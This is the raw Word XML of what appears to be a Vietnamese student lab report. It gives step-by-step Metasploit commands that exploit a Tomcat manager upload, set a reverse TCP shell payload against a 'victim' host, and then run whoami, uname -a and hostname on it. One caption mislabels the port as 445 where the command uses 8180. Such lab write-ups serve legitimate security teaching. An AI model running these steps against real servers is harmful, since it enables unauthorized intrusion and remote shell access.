    <w:p w14:paraId="10BCDFE2" w14:textId="53C211D0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 xml:space="preserve">- Khai báo sử dụng mô đun tấn công: msf &gt; use exploit/multi/http/tomcat_mgr_upload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57324642" w14:textId="7E3E48A2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</w:p>
    <w:p w14:paraId="367572F3" w14:textId="0E1B7BB7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F65C6A3" wp14:editId="0E824D09">
            <wp:extent cx="4656223" cy="830652"/>
            <wp:effectExtent l="0" t="0" r="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0E0A" w14:textId="37D20260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 xml:space="preserve">- Đặt địa chỉ IP máy victim: msf &gt; set RHOST </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB1E7E2" w14:textId="5A1975C2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</w:p>
    <w:p w14:paraId="1DC77735" w14:textId="5034D20D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56B184A" wp14:editId="488F8102">
            <wp:extent cx="5022015" cy="777307"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="8" name="Picture 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11DE" w14:textId="65BD37EC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 xml:space="preserve">- Đặt 445 là cổng truy cập máy victim: msf &gt; set RPORT 8180 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27173B0B" w14:textId="4140D476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</w:p>
    <w:p w14:paraId="6F2386EF" w14:textId="7C75EA15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2A21446" wp14:editId="2EF0A9F5">
            <wp:extent cx="4069433" cy="746825"/>
            <wp:effectExtent l="0" t="0" r="762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8370" w14:textId="61B4DE63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 xml:space="preserve">- Chọn payload cho thực thi (mở shell): msf &gt; set payload java/shell/reverse_tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C4799E" w14:textId="767A93B0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</w:p>
    <w:p w14:paraId="5780B95A" w14:textId="64C7B4CB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5C6FC7B4" wp14:editId="474D3D2D">
            <wp:extent cx="5082980" cy="739204"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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EA62" w14:textId="3A5B3758" w:rsidR="00D62D52" w:rsidRPr="004F4242" w:rsidRDefault="00D62D52" w:rsidP="00D62D52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>- Thực thi tấn công: msf &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58670029" w14:textId="2D182E78" w:rsidR="00362B22" w:rsidRPr="004F4242" w:rsidRDefault="00A2443B" w:rsidP="00D62D52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13BB7256" wp14:editId="191DFE53">
            <wp:extent cx="5273497" cy="1592718"/>
            <wp:effectExtent l="0" t="0" r="381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A32A" w14:textId="44A42CCA" w:rsidR="00362B22" w:rsidRPr="004F4242" w:rsidRDefault="00362B22" w:rsidP="00D62D52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DD179D" w14:textId="77777777" w:rsidR="00362B22" w:rsidRPr="004F4242" w:rsidRDefault="00362B22" w:rsidP="00D62D52">
      <w:pPr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>- Chạy các lệnh để đọc tên người dùng và máy đang truy cập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F04ED4" w14:textId="77777777" w:rsidR="00362B22" w:rsidRPr="004F4242" w:rsidRDefault="00362B22" w:rsidP="00362B22">
      <w:pPr>
        <w:ind w:left="720"/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 xml:space="preserve"> whoami </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD7A7AD" w14:textId="77777777" w:rsidR="00362B22" w:rsidRPr="004F4242" w:rsidRDefault="00362B22" w:rsidP="00362B22">
      <w:pPr>
        <w:ind w:left="720"/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 xml:space="preserve">uname -a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69570AE3" w14:textId="450D0723" w:rsidR="00362B22" w:rsidRPr="004F4242" w:rsidRDefault="00362B22" w:rsidP="00362B22">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4242">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A7812E" w14:textId="6A139F12" w:rsidR="00362B22" w:rsidRDefault="00362B22" w:rsidP="00D62D52"/>
    <w:p w14:paraId="0DCA72D3" w14:textId="50A05F4E" w:rsidR="00362B22" w:rsidRPr="00D62D52" w:rsidRDefault="00A2443B" w:rsidP="00D62D52">
      <w:r w:rsidRPr="00A2443B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33751E1C" wp14:editId="2F10EBCB">
            <wp:extent cx="5281118" cy="2392887"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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2B22" w:rsidRPr="00D62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E1C6A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A52AB9F6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CD06F01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E8CE3F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7369D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B0C4C5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B5293E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CBD099D4"/>
    <w:lvl w:ilvl="0" w:tplc="042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53F64232"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A3EA71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F5F3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E2DA6038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52F"/>
    <w:rsid w:val="00362B22"/>
    <w:rsid w:val="003B652F"/>
    <w:rsid w:val="003E49F2"/>
    <w:rsid w:val="004F4242"/>
    <w:rsid w:val="007C5E17"/>
    <w:rsid w:val="007E41DA"/>
    <w:rsid w:val="00A2443B"/>
    <w:rsid w:val="00BC1B89"/>
    <w:rsid w:val="00D62D52"/>
    <w:rsid w:val="00F83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C4DE1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EB343B54-A395-4481-B8F4-760952AE0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vi-V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C5E17"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:before="159" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="100" w:firstLine="719"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi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Quang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hiếu Quang</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-30T06:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-31T05:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>